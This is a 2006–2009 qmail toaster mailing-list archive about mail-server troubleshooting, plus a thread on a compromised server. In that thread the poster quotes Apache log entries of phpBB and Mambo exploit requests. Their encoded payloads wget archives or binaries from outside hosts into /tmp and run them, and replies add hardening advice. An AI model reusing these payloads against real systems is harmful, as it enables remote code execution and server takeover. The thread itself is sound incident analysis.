[toaster] qmail-smtpd.c compile error
I was wondering if any of you have run into these errors in your compiling of qmail. New Freebsd 7.2 server using all the toaster src downloads. I applied the qmail-toaster-0.9.1.patch to netqmail-1.05 and then ran MAKE and got these errors: ./compile qmail-smtpd.c qmail-smtpd.c:545: error: redefinition of 'saferead' qmail-smtpd.c:133: error: previous definition of 'saferead' was here qmail-smtpd.c:556: error: redefinition of 'ssin' qmail-smtpd.c:148: error: previous definition of 'ssin' was here qmail-smtpd.c: In function 'smtp_data': qmail-smtpd.c:688: error: 'rcptcount' undeclared (first use in this function) qmail-smtpd.c:688: error: (Each undeclared identifier is reported only once qmail-smtpd.c:688: error: for each function it appears in.) qmail-smtpd.c: In function 'main': qmail-smtpd.c:1226: warning: return type of 'main' is not 'int' *** Error code 1 Any help would be appreciated. Thanks, David Dresler
[toaster] Sasql
Greetings All, one of the servers i manage is running sasql 3.2.0 with SM 1.4.9a and i'm getting this error when using the "allow sender" link when viewing a message: ERROR: Database error in sasql_DBConnect: not found Fatal error: Call to a member function query() on a non-object in /usr/www/squirrelmail/plugins/sasql/sasql_db.php on line 329 However, i can add addresses from within the options/spam filters section just fine. This tells me the database configuration is working just fine, plus i can log into mysql from the command line using the username/password/database that sasql is being told to use. Any ideas? Thanks, David Dresler
[toaster] Hmm updated tmda and now it fails to automatically release messages
Had an older version working fine and went and updated it. (Doh!) Now it seems to work fine with the exception that confirmed emails are not automatically released. The sender's address makes it into the "confirmed" list and subsequent messages from them are delivered normally. If you use tmda.cgi and release the message manually, it goes through as expected but the sender then gets their original confirmation email sent back to them indicating that the message is no longer in the pending queue. I did some tests and see that qmail is indeed queueing the confirmation email from the sender even though tmda adds their address to the approved list. It seems that tmda must be failing to do the next step but I have no idea what that step would be. Qmail then sees the incomplete delivery and thus queues the message and tries again later. Any ideas? David M. Shirley [EMAIL PROTECTED]
[toaster] Unsubscription request
unsubscribe
Re: [toaster] Message send failure, 451 error
Thanks Adi, I did begin down that route, however then I tried a restart of the server (which had been running for about 140-something days) and that error has now gone away... weird, but good that it's gone. I do like to be able to find a reason for an error though; oh well, first case like that I've had using this toaster. Thanks and sorry for the delayed summary to this problem. David > On Wed, 7 Mar 2007 10:47:26 +1030 (CST) [EMAIL PROTECTED] wrote: > > [...] >> > rcpt <[EMAIL PROTECTED]> : found >> existing recipient 2007-03-07 10:43:59.838144500 connect(): No such >> file or directory 2007-03-07 10:44:00.016430500 tcpserver: end 13403 >> status 0 >> >> I am running clamdb through the simscan patch though, so i'll check >> that out. > > For testing purposes, try to take simscan out, undefine QMAILQUEUE > in /home/vpopmail/etc/tcp.smtp and see if it fixes the delivery. If > yes, then take a careful look at simscan integration and configuration. > > Cheers, > Adi > >> >> Regards, >> David >> >> > On Wed, 2007-03-07 at 02:29 +1030, [EMAIL PROTECTED] wrote: >> >> Thanks Shane, >> >> >> >> That was from /var/log/qmail/current, which I thought was a >> >> combination of >> >> qmail-send and qmail-smtpd, however I don't see all the info in it >> >> which I >> >> see in /var/log/qmail/smtpd/current so thanks here it is: >> >> >> >> log of a typical delivery attempt, looking at qmail-smtpd log >> >> >> >> # tail /var/log/qmail/smtpd/current | tai64nlocal >> >> >> >> 2007-03-07 02:27:13.881194500 tcpserver: ok 31451 >> >> 0:my_ip_address:25 :my_relays_ip_address::45142 >> >> 2007-03-07 02:27:14.508057500 CHKUSER accepted rcpt: from >> >> <[EMAIL PROTECTED]::> remote >> >> rcpt >> >> <[EMAIL PROTECTED]> : found existing recipient >> >> 2007-03-07 02:27:14.987645500 connect(): No such file or directory >> >> 2007-03-07 02:27:15.049539500 tcpserver: end 31451 status 0 >> >> >> >> This 'connect(): No such file or directory' message is new. >> > >> > You might want to try adding recordio to your smtpd/run file below >> > to get a more detailed output of where this connect error is >> > failing. Are you running clam and spamd? Maybe one of them isnt >> > running for some reason? Thats about my only guess at this point. >> > >> > Shane >> > >> >> I don't know >> >> which file it is talking about; the contents of my >> >> /service/qmail-smtpd/run file are: >> >> >> >> #!/bin/sh >> >> QMAILDUID=`id -u vpopmail` >> >> NOFILESGID=`id -g vpopmail` >> >> MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` >> >> exec /usr/local/bin/softlimit -m 1000 \ >> >> /usr/local/bin/tcpserver -v -H -R -l 0 \ >> >> -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ >> >> -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ >> >> /var/qmail/bin/qmail-smtpd \ >> >> /home/vpopmail/bin/vchkpw /bin/true 2>&1 >> >> >> >> (As you can see I have increased the memory limit whilst >> >> troubleshooting). >> >> >> >> I have verified that all executables exist, file permissions set >> >> correctly. I have done a qmailctl cdb. >> >> >> >> and >> >> # cat /home/vpopmail/etc/tcp.smtp >> >> >> >> 127.:allow,RELAYCLIENT="" >> >> :allow,QMAILQUEUE="/var/qmail/bin/simscan" >> >> >> >> /var/qmail/bin/simscan is there, permissions -rws--x--x, owned by >> >> clamav/root >> >> >> >> ...any more info I can provide? >> > >> > >> > >> > > >
Re: [toaster] Message send failure, 451 error
suggestion I modified qmail-smtpd/run to: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` exec /usr/local/bin/softlimit -m 1000 \ /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ recordio /var/qmail/bin/qmail-smtpd \ /home/vpopmail/bin/vchkpw /bin/true 2>&1 The log file looks about the same to me (/var/log/qmail/smtpd/current) 2007-03-07 10:43:58.252494500 tcpserver: pid 13403 from 2007-03-07 10:43:58.252499500 tcpserver: ok 13403 0::25 :::37633 2007-03-07 10:43:59.209212500 CHKUSER accepted rcpt: from <[EMAIL PROTECTED]::> remote > rcpt <[EMAIL PROTECTED]> : found existing recipient 2007-03-07 10:43:59.838144500 connect(): No such file or directory 2007-03-07 10:44:00.016430500 tcpserver: end 13403 status 0 I am running clamdb through the simscan patch though, so i'll check that out. Regards, David > On Wed, 2007-03-07 at 02:29 +1030, [EMAIL PROTECTED] wrote: >> Thanks Shane, >> >> That was from /var/log/qmail/current, which I thought was a combination >> of >> qmail-send and qmail-smtpd, however I don't see all the info in it which >> I >> see in /var/log/qmail/smtpd/current so thanks here it is: >> >> log of a typical delivery attempt, looking at qmail-smtpd log >> >> # tail /var/log/qmail/smtpd/current | tai64nlocal >> >> 2007-03-07 02:27:13.881194500 tcpserver: ok 31451 0:my_ip_address:25 >> :my_relays_ip_address::45142 >> 2007-03-07 02:27:14.508057500 CHKUSER accepted rcpt: from >> <[EMAIL PROTECTED]::> remote >> rcpt >> <[EMAIL PROTECTED]> : found existing recipient >> 2007-03-07 02:27:14.987645500 connect(): No such file or directory >> 2007-03-07 02:27:15.049539500 tcpserver: end 31451 status 0 >> >> This 'connect(): No such file or directory' message is new. > > You might want to try adding recordio to your smtpd/run file below to > get a more detailed output of where this connect error is failing. Are > you running clam and spamd? Maybe one of them isnt running for some > reason? Thats about my only guess at this point. > > Shane > >> I don't know >> which file it is talking about; the contents of my >> /service/qmail-smtpd/run file are: >> >> #!/bin/sh >> QMAILDUID=`id -u vpopmail` >> NOFILESGID=`id -g vpopmail` >> MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` >> exec /usr/local/bin/softlimit -m 1000 \ >> /usr/local/bin/tcpserver -v -H -R -l 0 \ >> -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ >> -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ >> /var/qmail/bin/qmail-smtpd \ >> /home/vpopmail/bin/vchkpw /bin/true 2>&1 >> >> (As you can see I have increased the memory limit whilst >> troubleshooting). >> >> I have verified that all executables exist, file permissions set >> correctly. I have done a qmailctl cdb. >> >> and >> # cat /home/vpopmail/etc/tcp.smtp >> >> 127.:allow,RELAYCLIENT="" >> :allow,QMAILQUEUE="/var/qmail/bin/simscan" >> >> /var/qmail/bin/simscan is there, permissions -rws--x--x, owned by >> clamav/root >> >> ...any more info I can provide? > > >
Re: [toaster] Message send failure, 451 error
Thanks Shane, That was from /var/log/qmail/current, which I thought was a combination of qmail-send and qmail-smtpd, however I don't see all the info in it which I see in /var/log/qmail/smtpd/current so thanks here it is: log of a typical delivery attempt, looking at qmail-smtpd log # tail /var/log/qmail/smtpd/current | tai64nlocal 2007-03-07 02:27:13.881194500 tcpserver: ok 31451 0:my_ip_address:25 :my_relays_ip_address::45142 2007-03-07 02:27:14.508057500 CHKUSER accepted rcpt: from <[EMAIL PROTECTED]::> remote rcpt <[EMAIL PROTECTED]> : found existing recipient 2007-03-07 02:27:14.987645500 connect(): No such file or directory 2007-03-07 02:27:15.049539500 tcpserver: end 31451 status 0 This 'connect(): No such file or directory' message is new. I don't know which file it is talking about; the contents of my /service/qmail-smtpd/run file are: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` exec /usr/local/bin/softlimit -m 1000 \ /usr/local/bin/tcpserver -v -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c "$MAXSMTPD" \ -u "$QMAILDUID" -g "$NOFILESGID" 0 smtp \ /var/qmail/bin/qmail-smtpd \ /home/vpopmail/bin/vchkpw /bin/true 2>&1 (As you can see I have increased the memory limit whilst troubleshooting). I have verified that all executables exist, file permissions set correctly. I have done a qmailctl cdb. and # cat /home/vpopmail/etc/tcp.smtp 127.:allow,RELAYCLIENT="" :allow,QMAILQUEUE="/var/qmail/bin/simscan" /var/qmail/bin/simscan is there, permissions -rws--x--x, owned by clamav/root ...any more info I can provide? Regards, David > On Wed, 2007-03-07 at 01:13 +1030, [EMAIL PROTECTED] wrote: >> Hi all, >> >> This problem regards a RH9 box I have had setup running a Shupp Toaster >> solidly for over 12 months. I have barely touched it in the last 6; >> system >> resources are fine and everything has been OK. Until last Friday, when >> people sending mail to my server started receiving something like this: >> >> (log entries from remote host, sending TO my server): >> >> 2007-03-07 00:56:15.625834500 status: local 0/10 remote 0/20 >> 2007-03-07 00:59:35.128206500 new msg 261221 >> 2007-03-07 00:59:35.128225500 info msg 261221: bytes 434 from >> <[EMAIL PROTECTED]> qp 27683 uid 89 >> 2007-03-07 00:59:35.34700 starting delivery 30048: msg 261221 to >> remote [EMAIL PROTECTED] >> 2007-03-07 00:59:35.347571500 status: local 0/10 remote 1/20 >> 2007-03-07 00:59:36.622510500 delivery 30048: deferral: >> 202.173.137.34_failed_after_I_sent_the_message./Remote_host_said:_451_mail_server_temporarily_rejected_message_(#4.3.0)/ >> 2007-03-07 00:59:36.622527500 status: local 0/10 remote 0/20 >> 2007-03-07 00:59:41.023791500 new msg 261327 >> 2007-03-07 00:59:41.023809500 info msg 261327: bytes 434 from >> <[EMAIL PROTECTED]> qp 27689 uid 89 >> 2007-03-07 00:59:41.207978500 starting delivery 30049: msg 261327 to >> remote [EMAIL PROTECTED] >> 2007-03-07 00:59:41.207997500 status: local 0/10 remote 1/20 >> 2007-03-07 00:59:42.484134500 delivery 30049: deferral: >> 202.173.137.34_failed_after_I_sent_the_message./Remote_host_said:_451_mail_server_temporarily_rejected_message_(#4.3.0)/ >> 2007-03-07 00:59:42.484154500 status: local 0/10 remote 0/20 > > This looks like its from the qmail-send logs which is outgoing from your > server and not incoming, so the mail is being rejected by the remote > host and not by your host. Doing a 'qmailctl queue' will show you any > messages in your queue. My guess is the remote host is running grey > listing of some sort. > > Shane > >> All I can find in reference to an error 451 are mentions of SPF errors, >> and I have not changed my SPF configuration. I have however experimented >> by disabling SPF (echo 1 > /var/qmail/control/spfbehaviour ; qmailctl >> restart) and (echo 0 > /var/qmail/control/spfbehaviour ; qmailctl >> restart) >> however neither made any difference. >> >> I've done all the obvious things, checked & repaired mysql databases, >> queried my domains with the qmail & vpopmail tools to make sure >> everything >> is working there. But not change; my mail server is simply rejecting >> everything not sent from one of my hosted domains. Sounds like >> greylisting; but I haven't made any configuration changes. I'm stuck... >> Can anyone help? > > > >
Re: [toaster] Message send failure, 451 error
Thanks Adrian, my bad - a typo. I was actually using control/spfbehavior David > On Wed, 7 Mar 2007 01:13:17 +1030 (CST) [EMAIL PROTECTED] wrote: > >> All I can find in reference to an error 451 are mentions of SPF >> errors, and I have not changed my SPF configuration. I have however >> experimented by disabling SPF (echo 1 >> > /var/qmail/control/spfbehaviour ; qmailctl restart) and (echo 0 >> > > /var/qmail/control/spfbehaviour ; qmailctl restart) >> however neither made any difference. > > You might try using control/spfbehavior instead of > control/spfbehaviour. See qmail-smtpd manpage for details. > > -- > Adrian Pircalabu > > >
[toaster] Message send failure, 451 error
Hi all, This problem regards a RH9 box I have had setup running a Shupp Toaster solidly for over 12 months. I have barely touched it in the last 6; system resources are fine and everything has been OK. Until last Friday, when people sending mail to my server started receiving something like this: (log entries from remote host, sending TO my server): 2007-03-07 00:56:15.625834500 status: local 0/10 remote 0/20 2007-03-07 00:59:35.128206500 new msg 261221 2007-03-07 00:59:35.128225500 info msg 261221: bytes 434 from <[EMAIL PROTECTED]> qp 27683 uid 89 2007-03-07 00:59:35.34700 starting delivery 30048: msg 261221 to remote [EMAIL PROTECTED] 2007-03-07 00:59:35.347571500 status: local 0/10 remote 1/20 2007-03-07 00:59:36.622510500 delivery 30048: deferral: 202.173.137.34_failed_after_I_sent_the_message./Remote_host_said:_451_mail_server_temporarily_rejected_message_(#4.3.0)/ 2007-03-07 00:59:36.622527500 status: local 0/10 remote 0/20 2007-03-07 00:59:41.023791500 new msg 261327 2007-03-07 00:59:41.023809500 info msg 261327: bytes 434 from <[EMAIL PROTECTED]> qp 27689 uid 89 2007-03-07 00:59:41.207978500 starting delivery 30049: msg 261327 to remote [EMAIL PROTECTED] 2007-03-07 00:59:41.207997500 status: local 0/10 remote 1/20 2007-03-07 00:59:42.484134500 delivery 30049: deferral: 202.173.137.34_failed_after_I_sent_the_message./Remote_host_said:_451_mail_server_temporarily_rejected_message_(#4.3.0)/ 2007-03-07 00:59:42.484154500 status: local 0/10 remote 0/20 All I can find in reference to an error 451 are mentions of SPF errors, and I have not changed my SPF configuration. I have however experimented by disabling SPF (echo 1 > /var/qmail/control/spfbehaviour ; qmailctl restart) and (echo 0 > /var/qmail/control/spfbehaviour ; qmailctl restart) however neither made any difference. I've done all the obvious things, checked & repaired mysql databases, queried my domains with the qmail & vpopmail tools to make sure everything is working there. But not change; my mail server is simply rejecting everything not sent from one of my hosted domains. Sounds like greylisting; but I haven't made any configuration changes. I'm stuck... Can anyone help? Many thanks, David
Re: [toaster] CHKUSER Logging
Nitchi DaMon <[EMAIL PROTECTED]> wrote: > > Is there a way to have CHKUSER log the connections > that are denied for invalid users? > > The log for SMTP is the /var/log/qmail/smtpd/ > > but it contains a great deal of information. Has > anyone created a patch or implemented MYsql logging > with this? > > > tia > > nitch. > For me, Logcheck (http://logcheck.org";>http://logcheck.org/) does a great job at separating stuff in my logs. Here's an excerpt of what it parses out for qmail-smtp. I get some more information from IMAPd and qmail-send. These threshold amounts can be changed, I'm certain even the number it lists from each section could be as well but I haven't looked too much into it. Thus far it works as I expect it to. - qmail-smtp Begin Connections from (Threshold of 1):211.237.173.234 - 5 Time(s) 194.150.155.44 - 5 Time(s)58.10.65.101 - 5 Time(s)... Blocked (Threshold of 1): 203.155.63.101 - 8 Time(s) By Blocked - seehttp://www.spamcop.net/bl.shtml?203.155.63.101";>http://www.spamcop.net/bl.shtml?203.155.63.101 124.120.133.201 - 7 Time(s) By Blocked - seehttp://www.spamcop.net/bl.shtml?124.120.133.201";>http://www.spamcop.net/bl.shtml?124.120.133.201 202.183.133.1 - 5 Time(s) By Blocked - seehttp://www.spamcop.net/bl.shtml?202.183.133.1";>http://www.spamcop.net/bl.shtml?202.183.133.1 204.212.126.159 - 5 Time(s... Chkuser Rejects From (Threshold of 1): [EMAIL PROTECTED] - 8 Time(s) [EMAIL PROTECTED] - 6 Time(s) [EMAIL PROTECTED] - 4 Time(s) [EMAIL PROTECTED] - 4 Time(s)... Chkuser Rejects To (Threshold of 1): [EMAIL PROTECTED] - 6 Time(s) [EMAIL PROTECTED] - 5 Time(s) [EMAIL PROTECTED] - 5 Time(s) [EMAIL PROTECTED] - 4 Time(s)... Chkuser Rejects Remote (Threshold of 1): 222.121.186.98 - 20 Time(s) 203.121.80.2 - 19 Time(s) 122.4.34.18 - 17 Time(s) 122.50.186.60 - 17 Time(s)... Chkuser Rejects Reason (Threshold of 1): not existing recipient - 346 Time(s) Chkuser Accepts from (Threshold of 1):[EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 2 Time(s) [EMAIL PROTECTED] - 1 Time(s) 125.137.14.83 - 14 Time(s)[EMAIL PROTECTED] - 5 Time(s)- 1 Time(s)... Chkuser Accepts to (Threshold of 1):[EMAIL PROTECTED] - 18 Time(s) Totals: Remote connections: 281Local connections: RBL blocked: 304Grand Total From: 584 Percentage blocked: 52.055 % Chkuser Totals:Rejected: 346 Accepted: 25
Re: [toaster] Greylisting
Nitchi DaMon <[EMAIL PROTECTED]> wrote: > > dumb question... > > what are most everyone here running for the OS? > > I've been using redhat for years now and migrated into > the Fedora Core. But I'm open to suggestions. > > tia. > > nitch.I manage a few servers. My heart will always be with Gentoo. But I do manage a few FC boxes as well.
Re: [toaster] strange delay on smtp connections
Rick Macdougall wrote: Carlos Solano wrote: I think relays.ordb.org is not working any more. I had the same issue, removed it and the problem was solved. Yup, you are correct and that should fix the OP's problem. Rick For information sake, ordb closed its doors on December 18, 2006 after 5 years of good/hard work. More information can be found at the provided URLs. http://www.virus.org/news/spyware/ordb-closed.html http://xbiz.com/news_piece.php?id=18748
[toaster] Re: Fw: failure notice
Adi Pircalabu wrote: Hi David, Looks like you are enforcing SPF beyond a reasonable limit :) See the attached bounce message. Cheers Subject: failure notice From: [EMAIL PROTECTED] Date: 24 Mar 2006 11:37:48 +0200 To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Hi. This is the qmail-send program at mail.bitdefender.com. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. <[EMAIL PROTECTED]>: 202.173.137.34 does not like recipient. Remote host said: 550 See http://spf.pobox.com/why.html?sender=adip%40gmx.net&ip=217.156.83.1&receiver=0 (#5.7.1) Giving up on 202.173.137.34. --- Below this line is a copy of the message. Return-Path: <[EMAIL PROTECTED]> Received: (qmail 10484 invoked by uid 1010); 24 Mar 2006 11:37:42 +0200 Received: from apircalabu.dsd.ro (10.10.15.22) by mail.bitdefender.com with SMTP; 24 Mar 2006 11:37:42 +0200 Date: Fri, 24 Mar 2006 11:35:33 +0200 From: Adi Pircalabu <[EMAIL PROTECTED]> To: toaster@shupp.org Cc: [EMAIL PROTECTED] Subject: Re: [toaster] Using maildrop with toaster & quota support Message-ID: <[EMAIL PROTECTED]> In-Reply-To: <[EMAIL PROTECTED]> References: <[EMAIL PROTECTED]> X-Mailer: Sylpheed-Claws 2.0.0 (GTK+ 2.8.16; i386-portbld-freebsd6.1) X-BitDefender-Scanner: Clean, Agent: BitDefender Qmail 1.6.2 on mail.bitdefender.com Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable X-BitDefender-SpamStamp: 1.1.4 04940111AAEAAAAAI X-BitDefender-Spam: No (13) On Thu, 23 Mar 2006 17:48:11 +1030 David wrote: MAILDIRQUOTA=3D=60=7Evpopmail/bin/vuserinfo -q =5BEMAIL PROTECTED=5D in the maildrop filter file. Can anybody tell me if this works with the Shupp toaster? I have successfully integrated maildrop as my LDA in a Shupp toaster, but it seems blissfully unaware of users' quotas and quota warning/over-quota messages get lost, and when the account fills up, maildrop just spits errors and the mail stops with maildrop. I am looking for a way to make it quota-aware. Why don't you use deliverquota (part of courier-imap package, I guess)? I think it does exactly what you need. >From the manpage: NAME deliverquota - deliver to a maildir with a quota SYNOPSIS deliverquota =5B -c =5D =5B -w percent =5D maildir quota DESCRIPTION deliverquota delivers mail to a maildir taking into account any software-imposed quota on the maildir. This manually-enforced quota mecha- nism is described in the maildirquota(7) and maildirmake(1) manual pages. Instead of setting up your mail server to deliver the message directly to a maildir, configure the mail server to run the deliv- erquota program in order to deliver the message, and specify the loca- tion of the maildir as the argument to deliverquota. Sorry about the late reply to this one Adi - I lost this e-mail for a while. Thanks for the suggestion of deliverquota - I will test it and see if I can make it do what I need. About the spf rules - I can't find where they are configured in my Shupp toaster - I will have a go at relaxing them. Regards, David.
Re: [toaster] Using maildrop with toaster & quota support
Bob Hutchinson wrote: On Thursday 23 Mar 2006 07:18, David wrote: Hi all, I would like to integrate maildrop at the .qmail file level, per-user. Something like a simple: |maildrop .mailfilter in the .qmail file (I read somewhere that I might need to | /usr/sbin/preline maildrop .mailfilter) I found a message in the list archives and have been referring to it at: http://www.mail-archive.com/toaster@shupp.org/msg03632.html Somebody (I think it was Bob Hutchinson) posted as part of an example in there: yeah, it was me ;-) I haven't figured out a way to get maildrop to check the quota on the fly either, ~vpopmail/bin/vuserinfo --help tells me that the -Q parameter returns a percentage, eg 45%, whereas -q just returns the quota set, not that helpful. So it should in principle be possible to write a script that tests the quota using -Q and returns something for maildrop to interpret and act upon. I'm not sure how exactly but this might get you started MAILDIRPERCENT=`~vpopmail/bin/vuserinfo -Q [EMAIL PROTECTED] | sed -e 's/%//'` $MAILDIRPERCENT should then contain 100 if the box is full Do let the list know if you crack it, I'm sure others will want to know too. MAILDIRQUOTA=`~vpopmail/bin/vuserinfo -q [EMAIL PROTECTED] in the maildrop filter file. Can anybody tell me if this works with the Shupp toaster? I have successfully integrated maildrop as my LDA in a Shupp toaster, but it seems blissfully unaware of users' quotas and quota warning/over-quota messages get lost, and when the account fills up, maildrop just spits errors and the mail stops with maildrop. I am looking for a way to make it quota-aware. Regards, David Thanks for the help Bob; I will mess about some more. Regards, David PS Sorry for late reply - was away from my email for a few days.
[toaster] Using maildrop with toaster & quota support
Hi all, I would like to integrate maildrop at the .qmail file level, per-user. Something like a simple: |maildrop .mailfilter in the .qmail file (I read somewhere that I might need to | /usr/sbin/preline maildrop .mailfilter) I found a message in the list archives and have been referring to it at: http://www.mail-archive.com/toaster@shupp.org/msg03632.html Somebody (I think it was Bob Hutchinson) posted as part of an example in there: MAILDIRQUOTA=`~vpopmail/bin/vuserinfo -q [EMAIL PROTECTED] in the maildrop filter file. Can anybody tell me if this works with the Shupp toaster? I have successfully integrated maildrop as my LDA in a Shupp toaster, but it seems blissfully unaware of users' quotas and quota warning/over-quota messages get lost, and when the account fills up, maildrop just spits errors and the mail stops with maildrop. I am looking for a way to make it quota-aware. Regards, David
Re: [toaster] Toaster compromised? Or system?
Bill Shupp wrote: David wrote: Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable. I used to allow my clients to install it, but every few months, SOMEONE would install an old exploitable version. I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore. I just run security updates daily instead on all packages. Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF. This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail exploit. But costs you expensive bandwitdth nonetheless. Regards, Bill !DSPAM:43ecbcde224031625613092! Cheers Bill, register_globals always off, but now I will probably disable url file operations too. Perhaps just enable them on a per-site setting David
Re: [toaster] Toaster compromised? Or system?
Thanks Peter - reassuring to know that someone else thinks they probably didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however. I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log:86.35.6.242 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=% 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client 85.214.20.161] request failed: erroneous characters aft er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http: //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David Peter Maag wrote: Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the cuplrit script. Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700: wget ftp lynx If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on this files, they had to have executed the script with: perl filename.pl Check out mod_security for Apache as well. Peter On 2/10/06, *David* <[EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]>> wrote: Rick Macdougall wrote: > David wrote: >> *warning long email* >> >> Hi all, >> >> We have been running a Shupp toaster for about 18 months on a Redhat >> 9 box, and the other day it appears it was compromised by spammers. I >> thought if I posted a few things I found about the system drive >> perhaps someone might be able to help me figure out how/how to >> prevent this... >> >> apache 32499 32498 0 Feb08 ?S 0:00 \_ perl >> /tmp/dc.txt 67.159.2 >> apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash > > Hi, > > I believe that is the xmlprc exploit against apache/php (could be the > phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). > > Upgrade your php and apache, find the xmlrpc.php in question and fix it. > > You can then use a tool like qmail-remove to clean out the queue. > > Regards, > > Rick > > > Thanks Rick, I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. Thanks, David. !DSPAM:43ecaff4216508586114564!
Re: [toaster] Toaster compromised? Or system?
Rick Macdougall wrote: David wrote: Rick Macdougall wrote: Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. http://news.netcraft.com/archives/2005/07/04/php_blogging_apps_vulnerable_to_xmlrpc_exploits.html Regards, Rick !DSPAM:43ecb255218571824112340! Thanks Rick! David
Re: [toaster] Toaster compromised? Or system?
Rick Macdougall wrote: David wrote: *warning long email* Hi all, We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 32498 0 Feb08 ?S 0:00 \_ perl /tmp/dc.txt 67.159.2 apache 32503 32499 0 Feb08 ?S 0:00 \_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards, Rick !DSPAM:43ec99dc204751732444004! Thanks Rick, I'm running php 4.3.10 and I can't find any information about a xmlrpc exploit; I also can't find any entries in my logs about dc.txt. I will keep looking. Thanks, David.
[toaster] Toaster compromised? Or system?
